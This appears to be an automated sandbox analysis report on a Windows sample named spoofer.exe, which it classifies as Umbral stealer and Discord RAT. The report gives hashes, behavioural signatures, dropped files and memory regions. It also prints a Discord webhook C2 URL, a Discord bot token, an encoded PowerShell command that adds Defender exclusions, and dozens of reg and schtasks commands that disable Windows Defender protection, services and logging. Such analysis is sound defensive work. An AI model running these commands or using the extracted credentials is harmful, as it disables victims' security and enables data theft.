Analysis

  • max time kernel
    144s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-01-2024 22:21

General

  • Target

    spoofer.exe

  • Size

    442KB

  • MD5

    d5a84036071756dee960de255bd6ab94

  • SHA1

    83b439582a8f3392f18dde97b56d937c518b1cd2

  • SHA256

    5cac485680e36e9e3cea0867d1373edff3a8995a20d21a2b7aa38247a0a3eb1d

  • SHA512

    fe0dec1e8422d9dd74431ccccff23e7083d356498ff98dc1c5680e1553c5145dbf1c854e48263c5d58a18c87c7bc7016294518ec1491045da7f62c1077a07779

  • SSDEEP

    12288:3o0NHvykT8QNmJCDWs2qUa3zYgNl3Qc65snvJ:3phFT8QC6WsVUM7NxQcsaJ

Malware Config

Extracted

Family

umbral

C2

https://ptb.discord.com/api/webhooks/1197286741825048616/mPoY62Pti_IE-hGcDYD9Kd5GhKzKQHzuySPby-xlg9GCRDWrviTGJ9au_QMU1pKDVh50

Extracted

Family

discordrat

Attributes
  • discord_token

    MTE5MzczNzA3MzIzNzE4MDQyNg.GQDWc0.k4Yc3XgNEdmji15f8P6ui2A0sVB2zvpOmkNPlw

  • server_id

    1196510448573489273

Signatures

  • Detect Umbral payload 4 IoCs
  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\spoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\spoofer.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1940
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcQB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAZgB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAawBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAdQB1ACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5536
    • C:\Windows\Spoofer.exe
      "C:\Windows\Spoofer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4680
    • C:\Windows\Woofer.exe
      "C:\Windows\Woofer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2092
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3264
    • C:\Windows\cleaner.exe
      "C:\Windows\cleaner.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:5080
  • C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4D26.tmp\4D27.tmp\4D28.bat C:\Windows\cleaner.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5260
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
      2⤵
        PID:2992
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        2⤵
          PID:2680
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
          2⤵
            PID:4876
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
            2⤵
            • Modifies Windows Defender Real-time Protection settings
            PID:5164
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
            2⤵
            • Modifies Windows Defender Real-time Protection settings
            PID:4320
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
            2⤵
              PID:3020
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
              2⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:3580
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
              2⤵
                PID:3644
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                2⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:3576
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                2⤵
                  PID:6044
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                  2⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:2376
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                  2⤵
                    PID:4336
                  • C:\Windows\system32\reg.exe
                    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                    2⤵
                      PID:3440
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                      2⤵
                        PID:1404
                      • C:\Windows\system32\schtasks.exe
                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                        2⤵
                          PID:2792
                        • C:\Windows\system32\schtasks.exe
                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                          2⤵
                            PID:1472
                          • C:\Windows\system32\schtasks.exe
                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                            2⤵
                              PID:3456
                            • C:\Windows\system32\reg.exe
                              reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                              2⤵
                                PID:3312
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                2⤵
                                  PID:5544
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                  2⤵
                                  • Modifies security service
                                  PID:2788
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                  2⤵
                                    PID:3484
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                    2⤵
                                      PID:3252
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                      2⤵
                                        PID:5356
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                        2⤵
                                          PID:4344
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                          2⤵
                                            PID:5352
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                            2⤵
                                              PID:400
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                              2⤵
                                                PID:2232
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                2⤵
                                                  PID:4704
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                  2⤵
                                                    PID:1176
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                    2⤵
                                                      PID:5404
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                      2⤵
                                                        PID:2800

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Temp\4D26.tmp\4D27.tmp\4D28.bat

                                                      Filesize

                                                      3KB

                                                      MD5

                                                      37a937d63e6dcc8f8de4b8847d210546

                                                      SHA1

                                                      98ca34f1a7cf66d583822b83cd1c65a1fb7f1d4a

                                                      SHA256

                                                      111ac48198ba45919584668ed9ad15010d316de7f1665f4d42ec249259f696bc

                                                      SHA512

                                                      062046aca604cf5f329590b1a9ee317974b45f0bdc18f70b74489ece55737480cbb5544d1ced8f5d0e8c66af4b38085ac4e70f26dac2b6d6a50d26f9b36e2b46

                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1vrm32y.jcz.ps1

                                                      Filesize

                                                      60B

                                                      MD5

                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                      SHA1

                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                      SHA256

                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                      SHA512

                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                    • C:\Windows\Spoofer.exe

                                                      Filesize

                                                      78KB

                                                      MD5

                                                      698d53d0e0b33c8eeec2dc5ee507e971

                                                      SHA1

                                                      a4c4999c0aeeb2552ec063960a37a4296bf6eb02

                                                      SHA256

                                                      3dbf21a8a065a297e0d16148f3931315e4e25e1872eed4fd9a256191571a223d

                                                      SHA512

                                                      5c6ec88ee5b93476f522d87f8edd4b8a1ce78ea47b8ee7d320941a092b5943877ff3a639a00589d6d2e937a41019ad12408576c4223d7a9ac87826d3385abef5

                                                    • C:\Windows\Woofer.exe

                                                      Filesize

                                                      231KB

                                                      MD5

                                                      c0922cfbf0bc3b88f4ab89146f1c5225

                                                      SHA1

                                                      c9120012509c3942e0299c1c7eb9fe190b978917

                                                      SHA256

                                                      59f283a7f4a7d50e13c963bb2ae0b3ebd0433bb73f2d582b2c9dd0e7564bce0d

                                                      SHA512

                                                      d7aaed129723526b66eb8e7917e893426d035bb2583200680cc2683038203dfdd7d48d0deaece13ea4de7eefcd948a891e6f107d19dc0e5f64a0dd760f100b9f

                                                    • C:\Windows\Woofer.exe

                                                      Filesize

                                                      116KB

                                                      MD5

                                                      096be4e0f15bbb453a7eac93406d556c

                                                      SHA1

                                                      0ebc721862bcad27c06c4d26a70f981f794baf50

                                                      SHA256

                                                      5300276f536187d12a0e409b653274a67668103e913f51272714d35048950f67

                                                      SHA512

                                                      ed0f7327f5b330bc0b8bb53a6f9c2d3965bdf6fd4e778c02c814940459b264fc6f4de0fbc4e604b8270dd071461cdfc278731a4af9e86b3e6d1baf39cca4d715

                                                    • C:\Windows\Woofer.exe

                                                      Filesize

                                                      78KB

                                                      MD5

                                                      9352aea1b0d7e9934a53b9fcde6c3bc4

                                                      SHA1

                                                      f6e03b7ad2fcc06d64f7fe05a72162fa0cb10fb6

                                                      SHA256

                                                      a7568389b1f0710624afd989350c1ad310dcad70511c611915171cbf7098b1e2

                                                      SHA512

                                                      b9482612037be69b10374df4418604297cd4675abd3261d22cee008497d49071630e900e1e5d655346f9b73492f93840faaa06c58df1407be84ad87056085c34

                                                    • C:\Windows\cleaner.exe

                                                      Filesize

                                                      127KB

                                                      MD5

                                                      86cb66d7f7740d8ae241ff6dae24a963

                                                      SHA1

                                                      19aff29c5319ba0bcbab649d16412b5e27f3e07c

                                                      SHA256

                                                      cea237087535cd1e6ed4c1fd199e9b297a2720eeac41eadd1976d2efda7bf9cf

                                                      SHA512

                                                      b8d1839e669795b0506448a2de98992ceccc5e24b4e6fb8c81397d3991cbfe56f0e285878ffcfe10a186bf2833343566208ae8d8af7b8f39ddbd2f316a410322

                                                    • memory/2092-40-0x00007FFE7D750000-0x00007FFE7E211000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/2092-36-0x00000246CEE60000-0x00000246CEEA0000-memory.dmp

                                                      Filesize

                                                      256KB

                                                    • memory/2092-63-0x00007FFE7D750000-0x00007FFE7E211000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/2092-39-0x00000246D0B10000-0x00000246D0B20000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/4680-59-0x00000159DBB10000-0x00000159DC038000-memory.dmp

                                                      Filesize

                                                      5.2MB

                                                    • memory/4680-38-0x00000159DA910000-0x00000159DA920000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/4680-93-0x00000159DA910000-0x00000159DA920000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/4680-92-0x00007FFE7D750000-0x00007FFE7E211000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/4680-91-0x00000159DB5E0000-0x00000159DB688000-memory.dmp

                                                      Filesize

                                                      672KB

                                                    • memory/4680-31-0x00000159C04A0000-0x00000159C04B8000-memory.dmp

                                                      Filesize

                                                      96KB

                                                    • memory/4680-35-0x00000159DAA20000-0x00000159DABE2000-memory.dmp

                                                      Filesize

                                                      1.8MB

                                                    • memory/4680-37-0x00007FFE7D750000-0x00007FFE7E211000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/5536-66-0x00000000707E0000-0x000000007082C000-memory.dmp

                                                      Filesize

                                                      304KB

                                                    • memory/5536-79-0x0000000007B40000-0x00000000081BA000-memory.dmp

                                                      Filesize

                                                      6.5MB

                                                    • memory/5536-53-0x0000000005B40000-0x0000000005BA6000-memory.dmp

                                                      Filesize

                                                      408KB

                                                    • memory/5536-47-0x0000000005AD0000-0x0000000005B36000-memory.dmp

                                                      Filesize

                                                      408KB

                                                    • memory/5536-60-0x0000000006160000-0x000000000617E000-memory.dmp

                                                      Filesize

                                                      120KB

                                                    • memory/5536-61-0x0000000006740000-0x000000000678C000-memory.dmp

                                                      Filesize

                                                      304KB

                                                    • memory/5536-77-0x0000000004CF0000-0x0000000004D00000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/5536-78-0x0000000007410000-0x00000000074B3000-memory.dmp

                                                      Filesize

                                                      652KB

                                                    • memory/5536-76-0x0000000006690000-0x00000000066AE000-memory.dmp

                                                      Filesize

                                                      120KB

                                                    • memory/5536-41-0x00000000749C0000-0x0000000075170000-memory.dmp

                                                      Filesize

                                                      7.7MB

                                                    • memory/5536-65-0x00000000066D0000-0x0000000006702000-memory.dmp

                                                      Filesize

                                                      200KB

                                                    • memory/5536-64-0x000000007F6F0000-0x000000007F700000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/5536-80-0x0000000006840000-0x000000000685A000-memory.dmp

                                                      Filesize

                                                      104KB

                                                    • memory/5536-58-0x0000000005CB0000-0x0000000006004000-memory.dmp

                                                      Filesize

                                                      3.3MB

                                                    • memory/5536-81-0x0000000007510000-0x000000000751A000-memory.dmp

                                                      Filesize

                                                      40KB

                                                    • memory/5536-46-0x00000000051B0000-0x00000000051D2000-memory.dmp

                                                      Filesize

                                                      136KB

                                                    • memory/5536-82-0x0000000007730000-0x00000000077C6000-memory.dmp

                                                      Filesize

                                                      600KB

                                                    • memory/5536-83-0x00000000076A0000-0x00000000076B1000-memory.dmp

                                                      Filesize

                                                      68KB

                                                    • memory/5536-84-0x00000000076E0000-0x00000000076EE000-memory.dmp

                                                      Filesize

                                                      56KB

                                                    • memory/5536-85-0x00000000076F0000-0x0000000007704000-memory.dmp

                                                      Filesize

                                                      80KB

                                                    • memory/5536-87-0x0000000007720000-0x0000000007728000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/5536-86-0x00000000077D0000-0x00000000077EA000-memory.dmp

                                                      Filesize

                                                      104KB

                                                    • memory/5536-90-0x00000000749C0000-0x0000000075170000-memory.dmp

                                                      Filesize

                                                      7.7MB

                                                    • memory/5536-45-0x0000000005330000-0x0000000005958000-memory.dmp

                                                      Filesize

                                                      6.2MB

                                                    • memory/5536-43-0x0000000004CF0000-0x0000000004D00000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/5536-42-0x0000000004BB0000-0x0000000004BE6000-memory.dmp

                                                      Filesize

                                                      216KB